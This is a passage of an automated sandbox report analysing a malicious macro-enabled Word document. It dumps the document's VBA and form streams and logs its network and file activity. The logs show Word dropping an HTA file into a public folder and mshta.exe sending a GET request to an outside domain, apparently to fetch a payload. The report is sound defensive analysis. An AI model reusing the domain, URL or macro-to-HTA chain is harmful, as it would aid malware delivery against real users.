General Stream Path: PROJECT File Type: ASCII text, with CRLF line terminators Stream Size: 627 Entropy: 5.40586418501 Base64 Encoded: True Data ASCII: I D = " { 8 0 A 8 6 9 A 6 - 4 D 2 1 - 4 5 2 D - B A 0 7 - 0 A C 1 F E C A D A 1 F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = f r m . . M o d u l e = b u f f e r T m p R e q u e s t . . M o d u l e = i n d e x P a s t e C o n v e r t . . C l a s s = a r r a y C o p y . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p Data Raw: 49 44 3d 22 7b 38 30 41 38 36 39 41 36 2d 34 44 32 31 2d 34 35 32 44 2d 42 41 30 37 2d 30 41 43 31 46 45 43 41 44 41 31 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42

Stream Path: PROJECTwm, File Type: data, Stream Size: 188

General Stream Path: PROJECTwm File Type: data Stream Size: 188 Entropy: 3.62591744772 Base64 Encoded: False Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . f r m . f . r . m . . . b u f f e r T m p R e q u e s t . b . u . f . f . e . r . T . m . p . R . e . q . u . e . s . t . . . i n d e x P a s t e C o n v e r t . i . n . d . e . x . P . a . s . t . e . C . o . n . v . e . r . t . . . a r r a y C o p y . a . r . r . a . y . C . o . p . y . . . . . Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 66 72 6d 00 66 00 72 00 6d 00 00 00 62 75 66 66 65 72 54 6d 70 52 65 71 75 65 73 74 00 62 00 75 00 66 00 66 00 65 00 72 00 54 00 6d 00 70 00 52 00 65 00 71 00 75 00 65 00 73 00 74 00 00 00 69 6e 64 65 78 50 61 73 74 65 43 6f 6e 76 65 72 74 00 69 00 6e 00 64 00 65 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4406

General Stream Path: VBA/_VBA_PROJECT File Type: data Stream Size: 4406 Entropy: 4.55274597771 Base64 Encoded: False Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . Data Raw: cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2428

General Stream Path: VBA/__SRP_0 File Type: data

Copyright Joe Security LLC 2021 Page 26 of 49 General Stream Size: 2428 Entropy: 3.66903322086 Base64 Encoded: True Data ASCII: . K * ...... * \\ C N o r m a l r U ...... @ ...... @ ...... @ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ N ...... " ...... 1 ...... p R z Data Raw: 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 206

General Stream Path: VBA/__SRP_1 File Type: data Stream Size: 206 Entropy: 1.75771081341 Base64 Encoded: False Data ASCII: r U @ ...... @ ...... @ ...... @ ...... ~ z ...... A ...... b ...... Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 532

General Stream Path: VBA/__SRP_2 File Type: data Stream Size: 532 Entropy: 2.02353640609 Base64 Encoded: False Data ASCII: r U ...... @ ...... @ ...... 8 ...... P ...... ` . . . A ...... q ...... ` i ...... Data Raw: 72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 c1 0b 00 00 00 00 00 00 00 00 00 00 e1 03 00 00 00 00 00 00 00 00 00 00 11 0c

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156

General

Stream Path: VBA/__SRP_3 File Type: data Stream Size: 156 Entropy: 1.78206636307 Base64 Encoded: False Data ASCII: r U @ ...... @ ...... @ ...... x . . . . . 8 ...... ` . . . . 8 ...... b ...... Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: SVR2 executable (Amdahl-UTS) not stripped - version 8520192, Stream Size: 1117

General Stream Path: VBA/dir File Type: SVR2 executable (Amdahl-UTS) not stripped - version 8520192 Stream Size: 1117 Entropy: 6.64142870906 Base64 Encoded: True

Copyright Joe Security LLC 2021 Page 27 of 49 General Data ASCII: . Y ...... 0 * . . . . . p . . H . . . . . d ...... P r o j e c t . Q . ( . . @ . . . . . = . . . . . l ...... b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C ...... 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F ...... * , \\ C ...... m . . Data Raw: 01 59 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 dc 84 7f 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: frm/\x1CompObj, File Type: data, Stream Size: 97

General Stream Path: frm/\x1CompObj File Type: data Stream Size: 97 Entropy: 3.61064918306 Base64 Encoded: False Data ASCII: ...... M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t ...... 9 . q ...... Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: frm/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 286

General Stream Path: frm/\x3VBFrame File Type: ASCII text, with CRLF line terminators Stream Size: 286 Entropy: 4.56658329518 Base64 Encoded: True Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } f r m . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . . Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 66 72 6d 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 33 30 31 35

Stream Path: frm/f, File Type: data, Stream Size: 90

General Stream Path: frm/f File Type: data Stream Size: 90 Entropy: 2.66114281725 Base64 Encoded: False Data ASCII: ...... } . . k ...... , . . . . . h o . . $ ...... , ...... b u t t o n 1 . a . . . a . . . Data Raw: 00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 07 00 00 80 01 00 00 00 2c 00 00 00 00 00 11 00 62 75 74 74 6f 6e 31 00 61 01 00 00 61 01 00 00

Stream Path: frm/o, File Type: data, Stream Size: 44

General Stream Path: frm/o File Type: data Stream Size: 44 Entropy: 3.03074109336 Base64 Encoded: False Data ASCII: ...... O ...... u ...... T a h o m a . . Data Raw: 00 02 0c 00 20 00 00 00 ec 09 00 00 4f 03 00 00 00 02 18 00 75 00 00 00 06 00 00 80 a5 00 00 00 cc 02 03 00 54 61 68 6f 6d 61 00 00

Network Port Distribution

Total Packets: 53 • 53 (DNS) • 80 (HTTP)

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP Apr 30, 2021 17:07:42.071327925 CEST 49718 80 192.168.2.3 193.203.203.235 Apr 30, 2021 17:07:42.205090046 CEST 80 49718 193.203.203.235 192.168.2.3 Apr 30, 2021 17:07:42.205228090 CEST 49718 80 192.168.2.3 193.203.203.235 Apr 30, 2021 17:07:42.205914021 CEST 49718 80 192.168.2.3 193.203.203.235 Apr 30, 2021 17:07:42.339493036 CEST 80 49718 193.203.203.235 192.168.2.3 Apr 30, 2021 17:07:42.593498945 CEST 80 49718 193.203.203.235 192.168.2.3 Apr 30, 2021 17:07:42.593633890 CEST 49718 80 192.168.2.3 193.203.203.235 Apr 30, 2021 17:07:47.598824024 CEST 80 49718 193.203.203.235 192.168.2.3 Apr 30, 2021 17:07:47.598897934 CEST 49718 80 192.168.2.3 193.203.203.235 Apr 30, 2021 17:07:50.237395048 CEST 49718 80 192.168.2.3 193.203.203.235

UDP Packets

Timestamp Source Port Dest Port Source IP Dest IP Apr 30, 2021 17:07:23.745417118 CEST 57544 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:23.794202089 CEST 53 57544 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:24.645523071 CEST 55984 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:24.694358110 CEST 53 55984 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:25.838167906 CEST 64185 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:25.889760017 CEST 53 64185 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:26.933653116 CEST 65110 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:26.982517004 CEST 53 65110 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:28.572649956 CEST 58361 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:28.621546030 CEST 53 58361 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:29.693321943 CEST 63492 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:29.742144108 CEST 53 63492 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:30.968628883 CEST 60831 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:31.017457962 CEST 53 60831 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:32.240434885 CEST 60100 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:32.292074919 CEST 53 60100 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:33.475368977 CEST 53195 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:33.567536116 CEST 53 53195 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:34.129133940 CEST 50141 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:34.205528975 CEST 53 50141 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:35.173966885 CEST 50141 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:35.235629082 CEST 53 50141 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:36.155590057 CEST 53023 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:36.188477993 CEST 50141 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:36.205585957 CEST 53 53023 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:36.248353958 CEST 53 50141 8.8.8.8 192.168.2.3

Copyright Joe Security LLC 2021 Page 29 of 49 Timestamp Source Port Dest Port Source IP Dest IP Apr 30, 2021 17:07:38.204952955 CEST 50141 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:38.264841080 CEST 53 50141 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:38.647641897 CEST 49563 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:38.699196100 CEST 53 49563 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:40.413201094 CEST 51352 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:40.464823008 CEST 53 51352 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:41.528465986 CEST 59349 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:41.577524900 CEST 53 59349 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:41.980226994 CEST 57084 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:42.052850008 CEST 53 57084 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:42.220201015 CEST 50141 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:42.279963017 CEST 53 50141 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:43.042907000 CEST 58823 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:43.100636959 CEST 53 58823 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:44.344048977 CEST 57568 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:44.392802000 CEST 53 57568 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:45.541116953 CEST 50540 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:45.589854956 CEST 53 50540 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:46.831238031 CEST 54366 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:46.879914999 CEST 53 54366 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:50.513555050 CEST 53034 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:50.565151930 CEST 53 53034 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:51.663151979 CEST 57762 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:51.723097086 CEST 53 57762 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:58.676517963 CEST 55435 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:58.733529091 CEST 53 55435 8.8.8.8 192.168.2.3 Apr 30, 2021 17:07:59.658179045 CEST 50713 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:07:59.717643023 CEST 53 50713 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:16.774000883 CEST 56132 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:16.835347891 CEST 53 56132 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:18.227579117 CEST 58987 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:18.286731005 CEST 53 58987 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:19.411917925 CEST 56579 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:19.470884085 CEST 53 56579 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:34.821213961 CEST 60633 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:34.916708946 CEST 53 60633 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:35.665025949 CEST 61292 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:35.725483894 CEST 53 61292 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:35.876801014 CEST 58722 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:35.921130896 CEST 56596 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:35.925817013 CEST 53 58722 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:35.950751066 CEST 64101 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:35.973961115 CEST 53 56596 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:36.001236916 CEST 53 64101 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:36.404859066 CEST 63619 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:36.468997002 CEST 53 63619 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:36.952919960 CEST 64938 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:37.012949944 CEST 53 64938 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:37.595051050 CEST 61946 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:37.652189970 CEST 53 61946 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:38.215560913 CEST 64910 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:38.272484064 CEST 53 64910 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:38.796176910 CEST 52123 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:38.853785992 CEST 53 52123 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:39.744133949 CEST 56130 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:39.793469906 CEST 53 56130 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:40.521557093 CEST 56338 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:40.593797922 CEST 53 56338 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:40.767853975 CEST 59420 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:40.816766024 CEST 53 59420 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:41.250627041 CEST 58784 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:41.307719946 CEST 53 58784 8.8.8.8 192.168.2.3 Apr 30, 2021 17:08:45.290184021 CEST 63978 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:08:45.349426985 CEST 53 63978 8.8.8.8 192.168.2.3

Copyright Joe Security LLC 2021 Page 30 of 49 Timestamp Source Port Dest Port Source IP Dest IP Apr 30, 2021 17:09:16.912919998 CEST 62938 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:09:16.970213890 CEST 53 62938 8.8.8.8 192.168.2.3 Apr 30, 2021 17:09:20.536809921 CEST 55708 53 192.168.2.3 8.8.8.8 Apr 30, 2021 17:09:20.593763113 CEST 53 55708 8.8.8.8 192.168.2.3

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Apr 30, 2021 17:07:41.980226994 CEST 192.168.2.3 8.8.8.8 0xb94b Standard query hesterhumo A (IP address) IN (0x0001) (0) ra.com

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Apr 30, 2021 8.8.8.8 192.168.2.3 0xb94b No error (0) hesterhumo 193.203.203.235 A (IP address) IN (0x0001) 17:07:42.052850008 ra.com CEST

HTTP Request Dependency Graph

hesterhumora.com

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.3 49718 193.203.203.235 80 C:\Windows\SysWOW64\mshta.exe

kBytes Timestamp transferred Direction Data Apr 30, 2021 1091 OUT GET /dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQPjsp3&OUM 17:07:42.205914021 CEST P=Aa93N&user=MYqjfAOnpCOmZrUkdR HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: hesterhumora.com Connection: Keep-Alive Apr 30, 2021 1096 IN HTTP/1.1 200 OK 17:07:42.593498945 CEST Date: Fri, 30 Apr 2021 15:07:42 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 X-Powered-By: PHP/7.2.34 Content-Length: 203 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 77 36 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: 404 Not Found

Not Found

The requested URL "law6" was not found on this server.

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 6116 Parent PID: 792

General

Start time: 17:07:31 Start date: 30/04/2021 Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Wow64 process (32bit): true Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding Imagebase: 0x11c0000 File size: 1937688 bytes MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\~DF0DF1D531EAB3D988.TMP read attributes | device synchronous io success or wait 1 66ADF261 unknown delete | syn non alert | non chronize | directory file | generic read | delete on close generic write C:\Users\user\AppData\Local\Temp\VBE read data or list device directory file | success or wait 1 66B8977C unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd read attributes | device synchronous io success or wait 1 66AC3F8E unknown synchronize | non alert | non generic read | directory file generic write C:\Users\user\Application Data\Microsoft\Forms read data or list device directory file | success or wait 1 66ABE349 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point

Copyright Joe Security LLC 2021 Page 32 of 49 Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\Application Data\Microsoft\Forms\WINWORD.box read attributes | device synchronous io success or wait 1 66ABE349 unknown synchronize | non alert | non generic read | directory file generic write C:\Users\user\AppData\Local\Temp\~DFE9922E621944E674.TMP read attributes | device synchronous io success or wait 1 66ABE349 unknown synchronize | non alert | non generic read | directory file generic write C:\Users\user\AppData\Local\Temp\~DFC42290EF3C7FEBD3.TMP read attributes | device synchronous io success or wait 1 66ABE349 unknown delete | syn non alert | non chronize | directory file | generic read | delete on close generic write c:\users\public\valuePasteList.hta read attributes | device synchronous io success or wait 1 66A91A7F unknown synchronize | non alert | non generic write directory file C:\Users\user\AppData\Local\Temp\~DF6C485975BA5B87EC.TMP read attributes | device synchronous io success or wait 1 66AB5805 unknown synchronize | non alert | non generic read | directory file generic write C:\Users\user\AppData\Local\Temp\~DFDF5D735246FB5985.TMP read attributes | device synchronous io success or wait 1 66BF7D31 unknown synchronize | non alert | non generic read | directory file generic write

File Deleted

Source File Path Completion Count Address Symbol C:\Users\user\AppData\Roaming\Microsoft\Forms\WINWORD.box success or wait 1 66ABE349 unknown C:\Users\user\AppData\Local\Temp\~DF6C485975BA5B87EC.TMP success or wait 1 66AB5805 unknown C:\Users\user\Desktop\~$aabd25_by_Libranalysis.docm success or wait 1 66AB5805 unknown C:\Users\user\AppData\Local\Temp\~DFDF5D735246FB5985.TMP success or wait 1 66B66A73 unknown C:\Users\user\AppData\Local\Temp\~DFE9922E621944E674.TMP success or wait 1 66B7232A unknown

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 4d 53 46 54 MSFT success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 02 00 01 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 09 04 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 51 00 Q. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 00 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 02 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 00 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 06 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 ab 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 cd 02 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 15 24 00 00 .$.. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 24 00 00 00 $... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 ff ff ff ff .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 20 00 00 00 ... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 80 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 